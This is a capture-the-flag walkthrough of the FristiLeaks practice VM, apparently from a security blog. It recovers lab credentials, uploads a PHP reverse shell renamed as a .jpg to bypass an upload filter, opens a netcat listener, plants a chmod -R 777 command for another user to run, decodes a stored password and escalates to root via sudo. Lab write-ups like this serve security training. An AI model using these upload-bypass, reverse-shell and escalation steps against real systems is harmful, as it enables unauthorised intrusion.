CTF: FristiLeaks Walkthrough

      Nessun commento su CTF: FristiLeaks Walkthrough

Hello dear friends, welcome back for another CTF Walkthrough. Today we will solve FristiLeaks.

Description

A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc..

Information gathering

TCP Scanning

Analyze the web app

After trying the various urls (cola, sisi, beer) I did understand that the correct one was fristi

By inspecting the source code we can identify an user (eezeepz)

and also we can find an image encoded in base64

We can use this website to convert base64 to image
https://codebeautify.org/base64-to-image-converter

 

Fantastic we have a username and password

  • Username: eezeepz
  • Password: keKkeKKeKKeKkEkkEk

Upload revshell

 

  • For the first thing, we will copy a webshell into our ctf directory:
  • cp /usr/share/webshells/php/php-reverse-shell.php .
  • Then we’ll modify the script with our ip and port
  • mv php-reverse-shell.php rev.php.jpg (the uploader accept only file with image extensions)
  • nc -nlvp 443
  • http://192.168.1.111/fristi/uploads/rev.php.jpg

Fantastic we have a reverse shell the next step is to escalate the privilege.

Privilege escalation

  • cd /home/eezeepz
  • cat notes.txt

Interesting we can create a file that will be executed with Jerry’s privilege.

  • echo ‘/usr/bin/../../bin/chmod -R 777 /home/admin’ > /tmp/runthis
  • cd admin
  • ls

We have two interesting file cryptpass.py and cryptedpass.txt, so we will use the script below with the cryptedpass for get the decrypted password

import base64,codecs,sys
def decodeString(str):
  rot13string = codecs.decode(str[::-1], 'rot13')
  return base64.b64decode(rot13string)
print decodeString("=RFn0AKnlMHMPIzpyuTI0ITG")

Fantastic we got the password (LetThereBeFristi!) for the fristigod user

  • su fristigod
  • cd /var/fristigod/.secret_admin_stuff
  • sudo -u fristi ./doCom /bin/bash

Fantastic we are root !!!

  • cd /root/
  • cat fristileaks_secrets.txt

Fantastic we have completed the FristiLeaks machine.